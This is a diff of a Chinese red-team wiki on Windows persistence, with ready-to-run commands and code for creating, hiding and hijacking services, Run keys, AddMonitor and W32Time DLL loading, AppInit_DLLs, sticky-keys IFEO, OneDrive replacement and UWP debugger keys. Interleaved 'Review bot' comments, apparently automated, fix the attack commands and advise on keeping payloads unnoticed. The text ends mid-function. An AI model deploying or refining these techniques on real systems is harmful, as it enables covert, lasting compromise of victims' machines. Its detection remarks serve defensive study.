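Review bot: `sc config Fax binPath= "C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem"` uses the wrong form for the last two options; sc.exe expects `option= value` with the space after the equals sign (`start= auto obj= LocalSystem`) and rejects the quoted forms with its usage text. More important is what the hunk does not say: the SCM starts the repointed binary as a service, and if `qwqdanchun.exe` never calls `StartServiceCtrlDispatcher` and reports RUNNING, the SCM kills it after the 30-second start timeout (error 1053), so the payload gets one short window per boot and the Fax service is visibly broken. The `reg add ... /v ImagePath` line writes the same value directly and takes effect at the next start; either way, record the original `ImagePath` so it can be restored.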


@ -0,0 +1,20 @@
# 隐藏服务
隐藏:
```text
sc.exe sdset qwqdanchun "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
```
恢复:
```text
sc.exe sdset qwqdanchun "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
```
参考文章:
{% embed url="https://www.freebuf.com/articles/system/254838.html" caption="" %}
{% embed url="https://www.sans.org/blog/red-team-tactics-hiding-windows-services/" caption="" %}
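Review bot: the hunk should explain what the SDDL in `sc.exe sdset qwqdanchun "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)..."` does and what it leaves visible. The three deny ACEs strip SERVICE_CHANGE_CONFIG, SERVICE_QUERY_STATUS, SERVICE_STOP, SERVICE_PAUSE_CONTINUE and DELETE from Interactive, Service and Administrators, so `sc query`, `Get-Service` and services.msc skip the service even when elevated. SYSTEM keeps `(A;;CCLCSWRPWPDTLOCRRC;;;SY)`, the key under `HKLM\SYSTEM\CurrentControlSet\Services\qwqdanchun` is untouched, and the process still appears in Task Manager, so `psexec -s sc query`, a registry listing, or a diff between the two is the detection. The 恢复 SDDL is the default service descriptor; say so, so readers know reapplying it is safe rather than a second trick.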


@ -0,0 +1,12 @@
# 劫持服务
劫持关闭事件:
```text
#REG
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax" /v FailureCommand /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f
#SC
sc failure Fax command= "\"C:\Temp\qwqdanchun.exe\""
```
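Review bot: `sc failure Fax command= "\"C:\Temp\qwqdanchun.exe\""` on its own does not run anything, because the command only executes when the service's failure action list contains a run-command action and this line sets none; unless Fax already has one (check with `sc qfailure Fax`), it needs `sc failure Fax reset= 0 actions= run/1000 command= "..."`. The `reg add ... /v FailureCommand` variant has the same gap, since the `FailureActions` binary value still holds no run action. The heading 劫持关闭事件 is also misleading: failure actions fire only when the service process exits without reporting SERVICE_STOPPED (a crash or a kill), not on a normal stop, unless `sc failureflag Fax 1` is also set; and Fax has to be running in the first place, so the trigger should be stated.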


@ -0,0 +1,18 @@
# 新建服务
1.命令行创建
```text
sc create qwqdanchun binpath= "cmd.exe /k C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem"
sc start qwqdanchun
```
2.Powershell
```text
New-Service -Name "qwqdanchun" -BinaryPathName "C:\Temp\qwqdanchun.exe" -Description "Service by qwqdanchun" -StartupType Automatic
sc start qwqdanchun
```
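Review bot: `sc create qwqdanchun binpath= "cmd.exe /k C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem"` has the same option-parsing problem as the 修改服务 page (`start= auto obj= LocalSystem`, with the space after `=`). Beyond that, the hunk should explain why `cmd.exe /k` is used: neither cmd.exe nor a plain payload calls `StartServiceCtrlDispatcher`, so the SCM terminates the process it started after the 30-second timeout (error 1053); with `cmd.exe /k` the killed process is cmd.exe and the child it spawned survives, whereas the `New-Service -Name "qwqdanchun" -BinaryPathName "C:\Temp\qwqdanchun.exe" ...` variant runs the payload directly and loses it after 30 seconds unless it implements the service API. Both variants need an elevated prompt, and `New-Service` only creates the service, hence the `sc start` that follows.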


@ -0,0 +1,2 @@
# 启动项


@ -0,0 +1,11 @@
# 文件夹
| 目录 |
| :--- |
| shell:startup |
| %appdata%\Microsoft\Windows\Start Menu\Programs\Startup |
| C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup |
| shell:common startup |
| %programdata%\Microsoft\Windows\Start Menu\Programs\Startup |
| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp |
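Review bot: the table mixes two kinds of entries without saying so. `shell:startup` and `shell:common startup` are shell-namespace aliases that Explorer, the Run dialog and `explorer.exe shell:startup` resolve, but `copy` or a script will not, whereas the `%appdata%`/`%programdata%` and `C:\...` rows are real paths. Add a note to that effect, and mention that the common (per-machine) folder under `C:\ProgramData` needs admin rights to write to, while the per-user folder does not and is therefore the one a low-privilege implant uses.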


@ -0,0 +1,78 @@
# 注册表
Flag等有时间每一条都写个poc或者解释下利用方法
| 注册表项 |
| :--- |
| HKCU\Environment\UserInitMprLogonScript |
| HKCU\Software\Classes\*\ShellEx\ContextMenuHandlers |
| HKCU\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers |
| HKCU\Software\Classes\Directory\ShellEx\ContextMenuHandlers |
| HKCU\Software\Classes\Directory\Shellex\DragDropHandlers |
| HKCU\Software\Classes\Drive\ShellEx\ContextMenuHandlers |
| HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run |
| HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\Shell |
| HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce |
| HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx |
| HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices |
| HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce |
| HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows |
| HKCU\Software\Policies\Microsoft\Windows\System\Scripts |
| HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run |
| HKLM\Software\Classes\*\ShellEx\PropertySheetHandlers |
| HKLM\Software\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance |
| HKLM\Software\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance |
| HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers |
| HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers |
| HKLM\Software\Classes\Directory\Shellex\CopyHookHandlers |
| HKLM\Software\Classes\Directory\Shellex\DragDropHandlers |
| HKLM\Software\Classes\Filter |
| HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers |
| HKLM\Software\Classes\Folder\ShellEx\DragDropHandlers |
| HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components |
| HKLM\Software\Microsoft\Rpc\Extensions |
| HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler |
| HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce |
| HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx |
| HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices |
| HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad |
| HKLM\Software\Policies\Microsoft\Windows\System\Scripts |
| HKLM\Software\Wow6432Node\Classes\*\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\*\ShellEx\PropertySheetHandlers |
| HKLM\Software\Wow6432Node\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance |
| HKLM\Software\Wow6432Node\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance |
| HKLM\Software\Wow6432Node\Classes\Directory\Background\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\Directory\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\Directory\Shellex\DragDropHandlers |
| HKLM\Software\Wow6432Node\Classes\Drive\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\Folder\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\Folder\ShellEx\DragDropHandlers |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components |
| HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32 |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler |
| HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad |
| HKLM\System\CurrentControlSet\Control\Lsa\ |
| HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages |
| HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages |
| HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors |
| HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors |
| HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls |
| HKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\ |
| HKLM\System\CurrentControlSet\Services |
| HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol\_Catalog9\Catalog\_Entries |
| HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol\_Catalog9\Catalog\_Entries64 |
| HKU\*\software\microsoft\windows\currentversion\explorer\user shell folders\startup |
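Review bot: several rows are damaged or wrong and will mislead anyone pasting them. `HKLM\Software\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance` and the three rows like it are missing the backslash before `{`; `HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows` should read `Windows NT`; the `Protocol\_Catalog9\Catalog\_Entries` rows carry escaped underscores that are not part of the path (`Protocol_Catalog9\Catalog_Entries`); `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad` is listed twice; and `RunServices` / `RunServicesOnce` are Windows 9x keys that NT-based Windows never reads, so they are not persistence locations. The "Flag" line at the top is a TODO and should be resolved or dropped before this page is published.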


@ -0,0 +1,2 @@
# 未分类


@ -0,0 +1,34 @@
# AddMonitor
AddMonitor\(\)函数可用于安装本地端口监视器并配置连接、数据和监视器文件。此函数能够将DLL注入spoolsv.exe进程以在系统上实现持久性。
C++
```cpp
#include "stdafx.h"
#include "Windows.h"
int main() {
MONITOR_INFO_2 monitorInfo;
TCHAR env[12] = TEXT("Windows x64");
TCHAR name[12] = TEXT("evilMonitor");
TCHAR dll[12] = TEXT("qwqdanchun.dll");
monitorInfo.pName = name;
monitorInfo.pEnvironment = env;
monitorInfo.pDLLName = dll;
AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
return 0;
}
//Compile to monitor.exe and move your evil DLL to %systemroot% then run the compiled monitor.exe
```
```text
#Then run this command
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /t REG_SZ /d "qwqdanchun.dll" /f
```
参考文章:
{% embed url="https://www.ired.team/offensive-security/persistence/t1013-addmonitor" caption="" %}
{% embed url="https://docs.microsoft.com/en-us/windows/win32/printdocs/addmonitor" caption="" %}
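Review bot: the C++ does not compile and the registry step does not match it. `TCHAR dll[12] = TEXT("qwqdanchun.dll");` needs 15 elements (14 characters plus the terminator), so the initializer is too long; declare the arrays with `[]` or `MAX_PATH`. `AddMonitor` also needs `#include <winspool.h>` and `winspool.lib` on the link line, and the program must run elevated. Then `reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" ...` creates a second monitor named `Pentestlab` while the code registered `evilMonitor`; `AddMonitor` already writes the `Driver` value under the monitor's own key, so either drop the `reg add` or keep the names in sync. Two facts to add: spoolsv.exe loads the DLL from `%systemroot%\System32`, not `%systemroot%` as the comment says, and it expects an `InitializePrintMonitor2` (or older `InitializePrintMonitor`) export; without it the DLL is unloaded again, which is fine for a `DllMain`-only payload but should be stated.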


@ -0,0 +1,14 @@
# AppInit\_DLLs注入
User32.dll被加载到进程时会加载”HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows”中Appinit\_Dlls的值修改其值可以使其加载恶意的脚本
```text
#Win10
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Temp\qwqdanchun.dll" /f
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f
#others
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Temp\qwqdanchun.dll" /f
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0x0 /f
```
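Review bot: the `#Win10` and `#others` blocks are mislabeled, if not reversed. `RequireSignedAppInit_DLLs` defaults to 1 on Windows 8 and later, so it is the Windows 10 block that needs the `RequireSignedAppInit_DLLs /d 0x0` line; and on Windows 8+ with Secure Boot enabled the AppInit_DLLs mechanism is disabled outright regardless of these values, which the hunk should say because it is the usual reason this technique silently does nothing. The mechanism also loads DLLs into every process that loads user32.dll, not "恶意的脚本", and a DLL that crashes or blocks takes every GUI process on the machine with it, which makes this the noisiest option on the list.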


@ -0,0 +1,12 @@
# Bios
现有产品:
{% embed url="https://www.absolute.com/platform/persistence/\#" caption="" %}
参考文章:
{% embed url="https://securelist.com/absolute-computrace-revisited/58278/" caption="" %}
{% embed url="https://bartblaze.blogspot.com/2014/11/thoughts-on-absolute-computrace.html" caption="" %}


@ -0,0 +1,10 @@
# cmd启动劫持
在cmd启动时会去注册表“HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Command Processor”中查看是否有AutoRun的健值如果有则会运行其中的内容
命令行:
```text
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "c:\Temp\qwqdanchun.exe" /f
```
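Review bot: two points on `reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v AutoRun ...`. First, the HKCU twin (`HKEY_CURRENT_USER\Software\Microsoft\Command Processor`, value `AutoRun`) works without admin rights and is the more common choice, so list both. Second, `AutoRun` executes for every cmd.exe instance, including the many `cmd /c` invocations made by scripts, installers and scheduled tasks (only `cmd /d` skips it), so a payload that blocks or writes to the console breaks those callers and gets noticed; the value should launch the payload detached (`start`) and return. Typo: "健值" should be "键值".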


@ -0,0 +1,10 @@
# 劫持更新程序
通过修改DNSARP欺骗等方法可以劫持程序查找更新的流量。
有很多程序启动时会连接网络并检查更新,可以借此实现持久化。
参考项目:
{% embed url="https://github.com/infobyte/evilgrade" caption="" %}


@ -0,0 +1,12 @@
# 利用LAPS
“本地管理员密码解决方案”LAPS在Active DirectoryAD中提供了机密/密码的集中存储。组织的域管理员可以确定哪些用户有权读取密码。([https://docs.microsoft.com/en-us/previous-versions/mt227395\(v=msdn.10\)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/mt227395%28v=msdn.10%29?redirectedfrom=MSDN)
可以通过对部署了此项目的主机上LAPS的一些修改实现持久化。
参考文章:
{% embed url="https://rastamouse.me/blog/laps-pt1/" caption="" %}
{% embed url="https://rastamouse.me/blog/laps-pt2/" caption="" %}


@ -0,0 +1,31 @@
# 滥用POWERSHELL配置文件
PowerShell启动时会执行配置文件的内容。
Powershell
```text
echo $profile
Test-Path $profile
New-Item -Path $profile -Type File Force
$string = 'Start-Process "C:\Temp\qwqdanchun.exe"'
$string | Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
```
Powershell默认配置文件有多个按照从上到下的顺序优先级从高到低
| Description | Path |
| :--- | :--- |
| All Users, All Hosts | $PSHOME\Profile.ps1 |
| All Users, Current Host | $PSHOME\Microsoft.PowerShell\_profile.ps1 |
| Current User, All Hosts | $Home\[My \]Documents\PowerShell\Profile.ps1 |
| Current user, Current Host | $Home\[My \]Documents\PowerShell\Microsoft.PowerShell\_profile.ps1 |
参考文章:
{% embed url="https://github.com/enigma0x3/PowershellProfile" caption="" %}
{% embed url="https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/" caption="" %}
{% embed url="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about\_profiles?view=powershell-7.1&viewFallbackFrom=powershell-6" caption="" %}
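Review bot: the script has two bugs. `New-Item -Path $profile -Type File Force` is missing the dash on `-Force`, so `Force` is left as a stray positional argument and the command errors instead of creating the file; and `Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1"` uses a cmd-style variable that PowerShell never expands, so it writes to a literal `%HOMEPATH%` path. The script already has `$profile`, so the last line should be `$string | Out-File -FilePath $profile -Append`. The table is mislabeled too: the four profiles are not alternatives ranked by priority, every one that exists is executed, in the order listed; and the `Documents\PowerShell\` paths are for PowerShell 6+, while Windows PowerShell 5.1 (present on every host) uses `Documents\WindowsPowerShell\`, so show both or say which. Lastly, the profile runs for every console the user opens and for `powershell.exe -Command` calls from other tools unless they pass `-NoProfile`; that is both the persistence and the noise.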


@ -0,0 +1,19 @@
# 替换文件
这是一种比较无脑,但是某种程度上还挺好用的方法。
简单的说就是替换现有的自启动文件最好的例子大概就是Onedrive了。不需要管理员权限就可以结束进程并且目录可写Win10默认会自启动。
简单利用示例:
```text
taskkill /f /im OneDrive.exe
copy c:\Temp\qwqdanchun.exe %LocalAppData%\Microsoft\OneDrive\OneDrive.exe
```
另外也可以修改浏览器等的快捷方式来实现被动启动的效果。具体实现将在后文LNK文件格式处详细讨论。
一例修改现有应用文件的攻击:
{% embed url="https://blog.trendmicro.com/trendlabs-security-intelligence/attack-gains-foothold-against-east-asian-government-through-auto-start/" caption="" %}
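Review bot: the OneDrive example needs its side effects stated. After `copy c:\Temp\qwqdanchun.exe %LocalAppData%\Microsoft\OneDrive\OneDrive.exe`, the HKCU `Run` value that starts OneDrive launches the payload with OneDrive's own `/background` argument, the user's sync stops, and the next OneDrive update writes a fresh `OneDrive.exe` over the payload; so this is short-lived and visible unless the payload renames the original first and launches it. `taskkill /f /im OneDrive.exe` is there because the copy fails while the file is in use; say so, since a reader who skips it gets an access-denied error.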


@ -0,0 +1,20 @@
# 屏幕保护
屏幕保护是Windows的一个功能使计算机屏幕可以在一段时间不活动后播放动画。
修改屏保加载的程序可以实现权限维持的效果。
命令行:
```text
#To make sure the SCRNSAVE is on
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d "0" /f
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
#For EXE file
reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Temp\qwqdanchun.exe
New-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'C:\Temp\qwqdanchun.exe'
#For SCR file
reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Temp\qwqdanchun.exe
New-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'C:\Temp\qwqdanchun.exe'
```
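Review bot: the `#For SCR file` lines (`reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Temp\qwqdanchun.exe` and the `New-ItemProperty` twin) are a verbatim copy of the `#For EXE file` lines and still point at the `.exe`, so the `.scr` case is never shown; change the two paths to `C:\Temp\qwqdanchun.scr` or drop the second block. Add that the screen saver is launched with the `/s` argument after `ScreenSaveTimeOut` seconds of idle time in the interactive session, so the payload runs as the logged-on user, not SYSTEM, and a payload that ignores `/s` and shows a window is seen immediately. The `/t REG_SZ` on `ScreenSaveTimeOut` is correct (the value is a string of seconds), which is worth a word because it looks like a mistake.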


@ -0,0 +1,10 @@
# SDB文件
Win10 已不适用
参考文章:
{% embed url="https://pentestlab.blog/2019/12/16/persistence-application-shimming/" caption="" %}
{% embed url="https://github.com/evil-e/sdb-explorer" caption="" %}
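Review bot: "Win10 已不适用" is asserted without a source or a build number, and the linked pentestlab article demonstrates application shimming in December 2019, i.e. on Windows 10; either cite the update or build where the technique stopped working or narrow the claim to the specific shim that no longer applies, since as written it will stop readers from testing something that may still work for them.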


@ -0,0 +1,15 @@
# 粘滞键
老生常谈的东西了,直接放利用代码:
```text
#Before Windows Vista
takeown /f sethc.* /a /r /d y
cacls sethc.exe /T /E /G administrators:F
copy /y cmd.exe sethc.exe
#Suggest you don't use this after Windows Vista.
#If you really like it,try this.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
```
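Review bot: the labels in this hunk do not describe the commands. `takeown /f sethc.* /a /r /d y` + `cacls` + `copy /y cmd.exe sethc.exe` is the file-replacement variant; it works on Vista and later (that is what `takeown` is for), but it must be run from `C:\Windows\System32`, it modifies a protected file that Windows Resource Protection and cumulative updates put back, and `cacls` is deprecated in favour of `icacls`. The `REG ADD ... \Image File Execution Options\sethc.exe /v Debugger ...` variant leaves the file alone but is the one Defender flags, and it lacks `/f`. So "#Before Windows Vista" / "#Suggest you don't use this after Windows Vista" should state which problem each approach has rather than a version cut-off, and since the 映像劫持 page already covers the `Debugger` value, cross-reference it instead of repeating the mechanism.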


@ -0,0 +1,10 @@
# 注册SSP DLL
## SSP <a id="h1-ssp"></a>
安全支持提供程序SSP是Windows API用于扩展Windows身份验证机制。LSASS进程在Windows启动期间会加载SSP DLL。
这种方法一般用来Dump内存并获取密码只是拿来做权限维持实在是大材小用了迄今为止也只听说了Lazarus这个朝鲜APT组织这么干过。。。[https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/](https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/%EF%BC%89)
再注找不到现有的POC自己也懒得写了所幸 [https://github.com/PowerShellMafia/PowerSploit](https://github.com/PowerShellMafia/PowerSploit) 里有一个”Install-SSP”方法有兴趣的同学可以去看看。至于注入SSP DLL的其他相关内容会在Mimikatz部分专门讨论。
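Review bot: the hunk points readers at PowerSploit's `Install-SSP` without saying what it does, so the detection surface is missing: it copies the DLL into `%WINDIR%\System32` and appends its name to the `Security Packages` value under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` (already listed in this page's registry table), and lsass.exe loads it only at the next boot. With LSA Protection (`RunAsPPL`) enabled, an unsigned SSP DLL is refused, which is the real reason the technique is rarely used for persistence rather than it being "大材小用". Typo: "再注" should presumably be "再者".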


@ -0,0 +1,25 @@
# UWP
使用调试器选项的Appx/UWP应用程序可以用来做权限维持。
Windows系统在启动时会自动启动若干UWP应用利用其注册表路径或者调试配置可以加载自己的程序以实现权限维持。
示例中展示了如何劫持小娜和人脉在实际使用时要自行修改路径以适配APP版本。
命令行:
```text
#First way for Cortana
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy /d "C:\Temp\qwqdanchun.exe"
#Second way for Cortana
reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
#First way for People
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:\Temp\qwqdanchun.exe"
#Second way for People
reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe\DebugInformation\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
```
参考文章:
{% embed url="https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/" caption="" %}
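Review bot: the package names in `reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy ...` are build-specific (`17134` is Windows 10 1803, and `Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe` is that month's Store build), which the text mentions only in passing; show how to get the current names (`Get-AppxPackage *Cortana* | Select PackageFullName`, and the `DebugInformation` subkey name from `HKCU\Software\Classes\ActivatableClasses\Package\<PackageFullName>`), because the lines as written do nothing on any other build. Add that the debugger is launched in place of the app with the app's executable as its argument, so the payload must start it or the app appears broken, and note that none of the four `reg add` lines has `/f`.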


@ -0,0 +1,205 @@
# W32Time
Windows启动期间将启动服务W32Time并加载w32time.dll。
可以通过修改如下两个注册表地址实现加载dll
```text
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /v DllName /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
sc.exe stop w32time
sc.exe start w32time
```
Scott Lundgren使用c++开发了gametime时间提供程序。可以使用此DLL来向操作系统注册新的时间提供者。这样可以避免滥用现有的Windows时间提供程序
C++:
```cpp
#include <Windows.h>
#include <TimeProv.h>
#include <strsafe.h>
#define GAMETIME_SVC_KEY_NAME L"System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\GameTime"
static WCHAR g_wzModule[MAX_PATH] = { L'\0' };
BOOL WINAPI DllMain(
_In_ HINSTANCE hInstDll,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
)
{
UNREFERENCED_PARAMETER(hInstDll);
UNREFERENCED_PARAMETER(lpvReserved);
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
(void)GetModuleFileNameW(hInstDll, g_wzModule, MAX_PATH);
break;
}
return (TRUE);
}
void WINAPI OutputError(
_In_ PWCHAR pwzMessage,
_In_ DWORD dwError
)
{
WCHAR wzError[1024] = { L'\0' };
if (SUCCEEDED(StringCchPrintfW(wzError, 1024, L"ERROR: [0x%0.8x] [%d] %s", dwError, dwError, pwzMessage)))
{
OutputDebugStringW(wzError);
}
}
/*
*
*/
HRESULT __stdcall TimeProvOpen(
_In_ WCHAR *wszName,
_In_ TimeProvSysCallbacks *pSysCallbacks,
_Out_ TimeProvHandle *phTimeProv
)
{
UNREFERENCED_PARAMETER(pSysCallbacks);
UNREFERENCED_PARAMETER(phTimeProv);
OutputDebugStringW(wszName);
return (HRESULT_FROM_WIN32(ERROR_NOT_CAPABLE));
}
/*
*
*/
HRESULT __stdcall TimeProvCommand(
_In_ TimeProvHandle hTimeProv,
_In_ TimeProvCmd eCmd,
_In_ PVOID pvArgs
)
{
UNREFERENCED_PARAMETER(hTimeProv);
UNREFERENCED_PARAMETER(eCmd);
UNREFERENCED_PARAMETER(pvArgs);
return (HRESULT_FROM_WIN32(ERROR_NOT_CAPABLE));
}
/*
*
*/
HRESULT __stdcall TimeProvClose(
_In_ TimeProvHandle hTimeProv
)
{
UNREFERENCED_PARAMETER(hTimeProv);
return (S_OK);
}
/*
* Register
*
* This is an exported helper function to register the GameTime time provider
*
* This is not transacted; failures may leave the registry in an inconsistent state
*
*/
void CALLBACK Register(
_In_ HWND hWnd,
_In_ HINSTANCE hInst,
_In_ LPSTR pwzCmdLine,
_In_ int nCmdShow)
{
HKEY hkTimeProvider = NULL;
LONG nRet;
DWORD dwOne = 1;
UNREFERENCED_PARAMETER(hWnd);
UNREFERENCED_PARAMETER(hInst);
UNREFERENCED_PARAMETER(pwzCmdLine);
